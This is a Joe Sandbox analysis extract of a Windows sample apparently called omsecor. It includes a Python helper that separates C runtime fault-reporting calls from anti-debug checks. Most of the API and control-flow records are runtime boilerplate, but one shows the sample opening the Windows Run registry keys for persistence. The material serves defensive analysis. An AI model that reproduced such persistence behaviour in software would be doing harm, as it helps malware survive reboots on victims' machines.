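Two API lists above begin with IsDebuggerPresent: the routine at 004020B3 and the subcall 00404121 reached from 00404854. Both continue with SetUnhandledExceptionFilter(0), UnhandledExceptionFilter, GetCurrentProcess and TerminateProcess, with C0000409 (STATUS_STACK_BUFFER_OVERRUN) or C000000D (STATUS_INVALID_PARAMETER) on the stack. That is the fault-reporting path of the Microsoft Visual C++ runtime (__report_gsfailure and __invoke_watson, which the report itself labels LIBCMT), not sample-specific debugger detection; the status value shows up as the "argument" of GetCurrentProcess only because it is pushed as TerminateProcess's exit code before GetCurrentProcess is called. Whether the sample checks for a debugger elsewhere is not settled by these two records, but these two hits are CRT boilerplate. The Python below is an added triage helper, not part of the Joe Sandbox report or of the sample: it parses API bullets in the report's own format and separates this CRT sequence from a bare IsDebuggerPresent check. The first two inputs are copied from this page; the third is constructed for contrast and does not occur in this report.

```python
import re
from typing import Dict, List

# Joe Sandbox prints one call per bullet: "<api>.<module>(<stack slots>), ref: <address>".
# Bullets prefixed "Part of subcall function XXXXXXXX:" list calls made inside a callee.
_CALL = re.compile(
    r"(?:Part of subcall function (?P<callee>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][\w:]*)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Copied from this report: the routine at 004020B3.
REPORT_4020B3 = """
• IsDebuggerPresent.KERNEL32 ref: 004020B3
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004020C8
• UnhandledExceptionFilter.KERNEL32(00408204), ref: 004020D3
• GetCurrentProcess.KERNEL32(C0000409), ref: 004020EF
• TerminateProcess.KERNEL32(00000000), ref: 004020F6
"""

# Copied from this report: the subcall 00404121 as listed under 00404854.
SUBCALL_404121 = """
• Part of subcall function 00404121: _memset.LIBCMT ref: 004041AD
• Part of subcall function 00404121: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 004041CB
• Part of subcall function 00404121: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 004041D5
• Part of subcall function 00404121: UnhandledExceptionFilter.KERNEL32(0040B078,?,?,00000000), ref: 004041DF
• Part of subcall function 00404121: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 004041FA
• Part of subcall function 00404121: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 00404201
"""

# Constructed for contrast (NOT from this report): a bare check followed by exit.
CONSTRUCTED_ANTIDEBUG = """
• IsDebuggerPresent.KERNEL32 ref: 00401000
• ExitProcess.KERNEL32(00000001), ref: 00401010
"""

# MSVC CRT fault path (__report_gsfailure, __invoke_watson -> _call_reportfault):
#   IsDebuggerPresent -> SetUnhandledExceptionFilter(NULL) -> UnhandledExceptionFilter
#   -> push <status>; GetCurrentProcess -> TerminateProcess(hProcess, <status>)
CRT_FAULT_SEQUENCE = ["IsDebuggerPresent", "SetUnhandledExceptionFilter",
                      "UnhandledExceptionFilter", "GetCurrentProcess", "TerminateProcess"]
CRT_FAULT_STATUS = {0xC0000409: "STATUS_STACK_BUFFER_OVERRUN",   # __report_gsfailure
                    0xC000000D: "STATUS_INVALID_PARAMETER"}      # __invoke_watson


def parse_calls(block: str) -> List[Dict]:
    """Turn the report's API bullets into dicts (api, module, args, ref, callee)."""
    calls = []
    for line in block.splitlines():
        m = _CALL.search(line)
        if not m:
            continue
        args = [a for a in (m.group("args") or "").split(",") if a]
        calls.append({"api": m.group("api"), "module": m.group("mod").upper(),
                      "args": args, "ref": int(m.group("ref"), 16),
                      "callee": m.group("callee")})
    return calls


def _in_order(apis: List[str], wanted: List[str]) -> bool:
    """True when every name in `wanted` occurs in `apis` in that order (gaps allowed)."""
    it = iter(apis)
    return all(any(a == w for a in it) for w in wanted)


def classify_debugger_check(block: str) -> Dict:
    """Decide whether an IsDebuggerPresent hit is CRT fault reporting or worth a look."""
    calls = parse_calls(block)
    apis = [c["api"] for c in calls]
    result = {"apis": apis, "verdict": "no-debugger-api", "status": None}
    if "IsDebuggerPresent" not in apis:
        return result
    result["verdict"] = "possible-anti-debug"      # stays unless proven to be CRT
    if not _in_order(apis, CRT_FAULT_SEQUENCE):
        return result
    # The status sits in the first stack slot shown for GetCurrentProcess, because the
    # CRT pushes TerminateProcess's exit code before it fetches the process handle.
    for c in calls:
        if c["api"] == "GetCurrentProcess" and c["args"]:
            try:
                code = int(c["args"][0], 16)
            except ValueError:
                continue
            if code in CRT_FAULT_STATUS:
                result["verdict"] = "msvc-crt-fault-report"
                result["status"] = CRT_FAULT_STATUS[code]
                break
    return result


if __name__ == "__main__":
    for name, block in [("004020B3", REPORT_4020B3), ("00404121", SUBCALL_404121),
                        ("constructed", CONSTRUCTED_ANTIDEBUG)]:
        r = classify_debugger_check(block)
        print(f"{name}: {r['verdict']} {r['status'] or ''}")
```

The check is deliberately strict: it only downgrades a hit when the whole five-call sequence is present with one of the two CRT status codes, so a sample that reuses IsDebuggerPresent in its own logic still comes out as possible-anti-debug and gets reviewed.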

                          Control-flow Graph (not recoverable from this extraction)
                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,00409328,0000000C,00401D18,00000000,00000000,?,?,?,00402F66), ref: 00401C18
                          • GetProcAddress.KERNEL32(?,EncodePointer), ref: 00401C4C
                          • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00401C5C
                          • InterlockedIncrement.KERNEL32(0040A3C8), ref: 00401C7E
                          • __lock.LIBCMT ref: 00401C86
                          • ___addlocaleref.LIBCMT ref: 00401CA5
                          Strings
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                          • API String ID: 1036688887-2843748187
                          • Opcode ID: 6573cce91d4b34aeafb212c3c1fc7eea0ad3c310865ce8df9fb52cfb0840fec2
                          • Instruction ID: 560e36331183b230e08dea58ace58335192f7a528c6e8c7e040251058e5fa637
                          • Opcode Fuzzy Hash: 6573cce91d4b34aeafb212c3c1fc7eea0ad3c310865ce8df9fb52cfb0840fec2
                          • Instruction Fuzzy Hash: 32113D719847019EE7209F76CA45B5ABBE4AF04348F10853FE899B62E1CB7C99418F19

                          Control-flow Graph (rendered graph not recoverable from this extraction; the node list below gives basic-block ranges, called APIs and edges, the executed/not-executed colouring is lost)
                          control_flow_graph 287 402c5b-402c82 call 402f98 GetStartupInfoA 290 402c83 call 404032 287->290 291 402c88-402c8c 290->291 292 402e92 291->292 293 402c92-402ca3 291->293 295 402e95-402e9a call 402fdd 292->295 294 402cce-402cd0 293->294 296 402cd2-402cd6 294->296 297 402ca5-402cc8 294->297 299 402dd9 296->299 300 402cdc-402ce1 296->300 297->294 302 402ddb-402deb 299->302 300->299 303 402ce7-402cf9 300->303 304 402df8-402dfe 302->304 305 402ded-402df0 302->305 306 402cfb 303->306 307 402cfd-402d00 303->307 309 402e00-402e03 304->309 310 402e05-402e0c 304->310 305->304 308 402df2-402df6 305->308 306->307 311 402d54-402d5a 307->311 314 402e6a-402e6e 308->314 315 402e0f-402e1b GetStdHandle 309->315 310->315 312 402d02-402d04 311->312 313 402d5c 311->313 316 402d06 call 404032 312->316 317 402d64-402d6a 313->317 314->302 318 402e74-402e82 SetHandleCount 314->318 319 402e60-402e64 315->319 320 402e1d-402e1f 315->320 321 402d0b-402d0f 316->321 317->299 322 402d6c-402d74 317->322 318->295 319->314 320->319 323 402e21-402e2a GetFileType 320->323 324 402d11-402d27 321->324 325 402d5e 321->325 326 402d76-402d79 322->326 327 402dcc-402dd7 322->327 323->319 328 402e2c-402e36 323->328 329 402d4f-402d51 324->329 325->317 326->327 330 402d7b-402d7f 326->330 327->299 327->322 331 402e38-402e3c 328->331 332 402e3e-402e41 328->332 335 402d53 329->335 336 402d29-402d49 329->336 330->327 337 402d81-402d83 330->337 333 402e47-402e4f 331->333 332->333 334 402e43 332->334 338 402e50 call 404763 333->338 334->333 335->311 336->329 339 402d90-402db9 337->339 340 402d85-402d8e GetFileType 337->340 342 402e55-402e59 338->342 341 402dba call 404763 339->341 340->327 340->339 343 402dbf-402dc3 341->343 342->292 344 402e5b-402e5e 342->344 343->292 345 402dc9 343->345 344->314 345->327
                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 00402C70
                          • __calloc_crt.LIBCMT ref: 00402C83
                            • Part of subcall function 00404032: __calloc_impl.LIBCMT ref: 00404040
                            • Part of subcall function 00404032: Sleep.KERNEL32(00000000), ref: 00404057
                          • __calloc_crt.LIBCMT ref: 00402D06
                          • GetFileType.KERNEL32(00000038), ref: 00402D86
                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00402DBA
                          • GetStdHandle.KERNEL32(-000000F6), ref: 00402E10
                          • GetFileType.KERNEL32(00000000), ref: 00402E22
                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00402E50
                          • SetHandleCount.KERNEL32 ref: 00402E7A
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Count$CritFileHandleInitSpinType___crt__calloc_crt$InfoSleepStartup__calloc_impl
                          • String ID:
                          • API String ID: 1318386821-0
                          • Opcode ID: f5d02d02a8b2d0f0c38f4cc661f228c40208417c0c2fd58e7995995fa6c6c4fe
                          • Instruction ID: b2392c38ea11d8206f0d28861f948c6360aed0bed67f1e2b59f3cb23873ff797
                          • Opcode Fuzzy Hash: f5d02d02a8b2d0f0c38f4cc661f228c40208417c0c2fd58e7995995fa6c6c4fe
                          • Instruction Fuzzy Hash: 366136715447518ED7248B38CB4C7167BA0EF02324F29437BD9A5BB2E1D7B89806CB9D

                          Control-flow Graph (rendered graph not recoverable from this extraction; the node list below gives basic-block ranges, called APIs and edges, the executed/not-executed colouring is lost)
                          control_flow_graph 346 403bd3-403bfa call 403b59 349 403c0a-403c0d 346->349 350 403bfc-403c05 call 403854 346->350 352 403c0f-403c15 349->352 357 403d9d-403da4 350->357 354 403c1b-403c26 352->354 355 403cac-403cd0 call 405f60 352->355 354->352 358 403c28-403c2e 354->358 364 403cfc-403cff 355->364 359 403da5 call 401662 357->359 361 403c34-403c3a 358->361 362 403d9a 358->362 363 403daa-403dab 359->363 361->362 365 403c40-403c4c IsValidCodePage 361->365 362->357 367 403d01-403d11 364->367 368 403cd2-403cd7 364->368 365->362 366 403c52-403c5f GetCPInfo 365->366 369 403c65-403c83 call 405f60 366->369 370 403d8e-403d94 366->370 367->364 371 403d13-403d32 call 403825 367->371 368->367 372 403cd9-403cdf 368->372 380 403d81 369->380 381 403c89-403c8d 369->381 370->350 370->362 382 403d33-403d3e 371->382 375 403cf3-403cf5 372->375 378 403ce1-403cf2 375->378 379 403cf7-403cfb 375->379 378->375 379->364 383 403d84-403d8c 380->383 384 403d62-403d65 381->384 385 403c93 381->385 382->382 386 403d40-403d47 call 4038a9 382->386 383->386 389 403d6a-403d6f 384->389 387 403c96-403c9a 385->387 396 403d4c-403d51 386->396 387->384 390 403ca0-403ca7 387->390 389->389 392 403d71-403d7f call 403825 389->392 394 403d52-403d54 390->394 392->383 394->396 397 403d56-403d5c 394->397 396->394 397->384 397->387
                          APIs
                          • getSystemCP.LIBCMT ref: 00403BEC
                            • Part of subcall function 00403B59: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00403B66
                            • Part of subcall function 00403B59: GetOEMCP.KERNEL32(00000000,?,00402A85,?,?,00000001), ref: 00403B80
                          • setSBCS.LIBCMT ref: 00403BFE
                            • Part of subcall function 00403854: _memset.LIBCMT ref: 00403867
                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,00409430), ref: 00403C44
                          • GetCPInfo.KERNEL32(00000000,00403F56), ref: 00403C57
                          • _memset.LIBCMT ref: 00403C6F
                          • setSBUpLow.LIBCMT ref: 00403D42
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                          • String ID:
                          • API String ID: 2658552758-0
                          • Opcode ID: 85fbc29d6093aa115f5ab7fa086d66e65b660b38745e4bae39b2770f61390fd6
                          • Instruction ID: 0e9026f4e105130f7015617c44e62dc713e6d3fa9c6682f74f6de7838a23a284
                          • Opcode Fuzzy Hash: 85fbc29d6093aa115f5ab7fa086d66e65b660b38745e4bae39b2770f61390fd6
                          • Instruction Fuzzy Hash: 875108319042558BDB159F25C8442BABFB8EF05306F14847FE881FF282C63CCA46DB99

                          Control-flow Graph (rendered graph not recoverable from this extraction; the node list below gives basic-block ranges, called APIs and edges, the executed/not-executed colouring is lost)
                          control_flow_graph 398 401aaa-401abb TlsGetValue 399 401abd-401ac5 398->399 400 401ade-401aed GetModuleHandleA 398->400 399->400 401 401ac7-401ad4 TlsGetValue 399->401 402 401b12-401b17 400->402 403 401aef-401af6 call 401a3e 400->403 401->400 407 401ad6-401adc 401->407 403->402 408 401af8-401afe GetProcAddress 403->408 409 401b04-401b06 407->409 408->409 409->402 410 401b08-401b0e 409->410 410->402
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00401B1F,00000000,00404862,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AB7
                          • TlsGetValue.KERNEL32(00000004,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401ACE
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AE3
                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00401AFE
                          Strings
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressHandleModuleProc
                          • String ID: EncodePointer$KERNEL32.DLL
                          • API String ID: 1929421221-3682587211
                          • Opcode ID: cfafac40d43195ef6ab0f83e6a66070465950e04f68e4f312de4a4817b66f2e0
                          • Instruction ID: 2de7d8fd10128b17cfc71597f2b569db04ade18300f5c4710948ea3b5a4a2571
                          • Opcode Fuzzy Hash: cfafac40d43195ef6ab0f83e6a66070465950e04f68e4f312de4a4817b66f2e0
                          • Instruction Fuzzy Hash: 68F06D307017169BD7219F25DE04A5A3AB8AF80790B16417AB844F62F4EF38DC029A6D

                          Control-flow Graph (rendered graph not recoverable from this extraction; the node list below gives basic-block ranges, called APIs and edges, the executed/not-executed colouring is lost)
                          control_flow_graph 412 401b21-401b32 TlsGetValue 413 401b34-401b3c 412->413 414 401b55-401b64 GetModuleHandleA 412->414 413->414 415 401b3e-401b4b TlsGetValue 413->415 416 401b66-401b6d call 401a3e 414->416 417 401b89-401b8e 414->417 415->414 421 401b4d-401b53 415->421 416->417 422 401b6f-401b75 GetProcAddress 416->422 423 401b7b-401b7d 421->423 422->423 423->417 424 401b7f-401b85 423->424 424->417
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                          • TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00402F66), ref: 00401B5A
                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00401B75
                          Strings
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressHandleModuleProc
                          • String ID: DecodePointer$KERNEL32.DLL
                          • API String ID: 1929421221-629428536
                          • Opcode ID: 436f779fc0fdf30fb8c2a4f5b6e2e396cf7c0272443af951d572ffac3d80a1eb
                          • Instruction ID: 1a7e216e592b3cd04d2002f0154b272c3d781bc2d345389bf2442321812c8d59
                          • Opcode Fuzzy Hash: 436f779fc0fdf30fb8c2a4f5b6e2e396cf7c0272443af951d572ffac3d80a1eb
                          • Instruction Fuzzy Hash: 96F062305013129BC7215F24DE44E6A3AB89F407947154136F854F22F0EF34DC018A6D

                          Control-flow Graph

                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 004016EA
                          • GetProcessHeap.KERNEL32(00000000,00000094), ref: 00401705
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00401708
                          • _fast_error_exit.LIBCMT ref: 00401716
                            • Part of subcall function 00401671: __FF_MSGBANNER.LIBCMT ref: 0040167A
                          • ___security_init_cookie.LIBCMT ref: 004018B6
                          Strings
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocateInfoProcessStartup___security_init_cookie_fast_error_exit
                          • String ID: j`h
                          • API String ID: 2660455748-2627015977
                          • Opcode ID: aba137c0f2f88c3b9200040e126f3ca684e81be6c5eda89adfc1ccd5f8954634
                          • Instruction ID: 7291aa48b631972549e6df949c7a5fbc9f7bec4cf14f78cf3737268845182a7c
                          • Opcode Fuzzy Hash: aba137c0f2f88c3b9200040e126f3ca684e81be6c5eda89adfc1ccd5f8954634
                          • Instruction Fuzzy Hash: C3F02E36D01705A7E720A7B4CE49B6D3134AB88765F35013BF5017B2E2CABC4D06A62D
                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 004016EA
                          • GetProcessHeap.KERNEL32(00000000,00000094), ref: 00401705
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00401708
                          • _fast_error_exit.LIBCMT ref: 00401716
                            • Part of subcall function 00401671: __FF_MSGBANNER.LIBCMT ref: 0040167A
                          • ___security_init_cookie.LIBCMT ref: 004018B6
                          Strings
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocateInfoProcessStartup___security_init_cookie_fast_error_exit
                          • String ID: j`h
                          • API String ID: 2660455748-2627015977
                          • Opcode ID: c8d3cbbb43655427b4a603559900b38778fbedebf47b5c9131e32ddd9e0d4b3d
                          • Instruction ID: 38895570f31eb67b982826470c9dd1e6c230b0faa58df9c9f10e023fb9096192
                          • Opcode Fuzzy Hash: c8d3cbbb43655427b4a603559900b38778fbedebf47b5c9131e32ddd9e0d4b3d
                          • Instruction Fuzzy Hash: 4DF0E936E48301D7E720A7A09D49B2D3134AB44765F34053BE001BB2E1CDBC4942661F
                          APIs
                          • __lock.LIBCMT ref: 00403F82
                            • Part of subcall function 004034EE: __mtinitlocknum.LIBCMT ref: 00403502
                            • Part of subcall function 004034EE: __amsg_exit.LIBCMT ref: 0040350E
                            • Part of subcall function 004034EE: RtlEnterCriticalSection.NTDLL(?), ref: 00403516
                          • ___sbh_find_block.LIBCMT ref: 00403F8D
                          • ___sbh_free_block.LIBCMT ref: 00403F9C
                          • HeapFree.KERNEL32(00000000,?,00409450,0000000C,004034CF,00000000,004093D0,0000000C,00403507,?,?,?,00406798,00000004,00409530,0000000C), ref: 00403FCC
                          • GetLastError.KERNEL32(?,00406798,00000004,00409530,0000000C,00404045,?,?,00000000,00000000,00000000,00401CEF,00000001,00000214), ref: 00403FDD
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 2714421763-0
                          • Opcode ID: 288a25c0387cb816e710d6056d2e667d0bdf05a7bdcb3ee8ac501960d13b8eb0
                          • Instruction ID: 478c35e85f2b107ed22a8aba67e00a0e018390ca299f0d6e226d856ee505d4b6
                          • Opcode Fuzzy Hash: 288a25c0387cb816e710d6056d2e667d0bdf05a7bdcb3ee8ac501960d13b8eb0
                          • Instruction Fuzzy Hash: AB012C71D05602AADB207FB29A0AB5E7A78DF0076AF20413FF404B61D1CB7C8A449A9D
                          APIs
                            • Part of subcall function 00401D3D: __amsg_exit.LIBCMT ref: 00401D4B
                          • __amsg_exit.LIBCMT ref: 00403A5F
                          • __lock.LIBCMT ref: 00403A6F
                          • InterlockedDecrement.KERNEL32(?), ref: 00403A8C
                          • InterlockedIncrement.KERNEL32(02181588), ref: 00403AB7
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Interlocked__amsg_exit$DecrementIncrement__lock
                          • String ID:
                          • API String ID: 4129207761-0
                          • Opcode ID: 8585fda054ee7361396d1f478d0024bbf818f9282079b570ad35bde21b9f8bf2
                          • Instruction ID: 3b707b5fd0894213fb8e8695ce472a26b52a1803b1b57e4fe7db1faaf9775e12
                          • Opcode Fuzzy Hash: 8585fda054ee7361396d1f478d0024bbf818f9282079b570ad35bde21b9f8bf2
                          • Instruction Fuzzy Hash: 3A018E32E00B119BD611AF6A990974A7B64BB05716F05403BE890773D1C73CAB51DFDE
                          APIs
                          • GetLastError.KERNEL32(?,00000000,00404281,00402202,00000000,00402EFA,FFFFFFFE,?,?,?,?,00402F66), ref: 00401CC8
                            • Part of subcall function 00401B98: TlsGetValue.KERNEL32(00000000,00401CDB,?,?,?,00402F66), ref: 00401B9F
                            • Part of subcall function 00401B98: TlsSetValue.KERNEL32(00000000,?,?,00402F66), ref: 00401BC0
                          • __calloc_crt.LIBCMT ref: 00401CEA
                            • Part of subcall function 00404032: __calloc_impl.LIBCMT ref: 00404040
                            • Part of subcall function 00404032: Sleep.KERNEL32(00000000), ref: 00404057
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                            • Part of subcall function 00401C07: GetModuleHandleA.KERNEL32(KERNEL32.DLL,00409328,0000000C,00401D18,00000000,00000000,?,?,?,00402F66), ref: 00401C18
                            • Part of subcall function 00401C07: GetProcAddress.KERNEL32(?,EncodePointer), ref: 00401C4C
                            • Part of subcall function 00401C07: GetProcAddress.KERNEL32(?,DecodePointer), ref: 00401C5C
                            • Part of subcall function 00401C07: InterlockedIncrement.KERNEL32(0040A3C8), ref: 00401C7E
                            • Part of subcall function 00401C07: __lock.LIBCMT ref: 00401C86
                            • Part of subcall function 00401C07: ___addlocaleref.LIBCMT ref: 00401CA5
                          • GetCurrentThreadId.KERNEL32 ref: 00401D1A
                          • SetLastError.KERNEL32(00000000,?,?,?,00402F66), ref: 00401D32
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref__calloc_crt__calloc_impl__lock
                          • String ID:
                          • API String ID: 1081334783-0
                          • Opcode ID: 098acf1058f6266e08016df3b7da3ea01f889e9df5624f40869082c495d6053c
                          • Instruction ID: d2849ffa799b97934cc6d9bfafbcb639600e9549b280b5eba9c9c239b681eae2
                          • Opcode Fuzzy Hash: 098acf1058f6266e08016df3b7da3ea01f889e9df5624f40869082c495d6053c
                          • Instruction Fuzzy Hash: 2EF0FF325447229AD6363BB96D0AA8F3AA49F41761711093FF580B61F0CF3CD80296AD

Control-flow Graph
                          control_flow_graph 121 40abd9-40abf5 call 40ac20 124 40abf7-40ac0c FindFirstFileW 121->124 125 40ac1a 121->125 124->125 126 40ac0e-40ac18 FindClose 124->126 127 40ac1c-40ac1f 125->127 126->127
                          APIs
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                          • FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
                          • FindClose.KERNEL32(00000000), ref: 0040AC0F
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FindOpen$CloseFileFirst
                          • String ID:
                          • API String ID: 3155378417-0
                          • Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                          • Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
                          • Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                          • Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
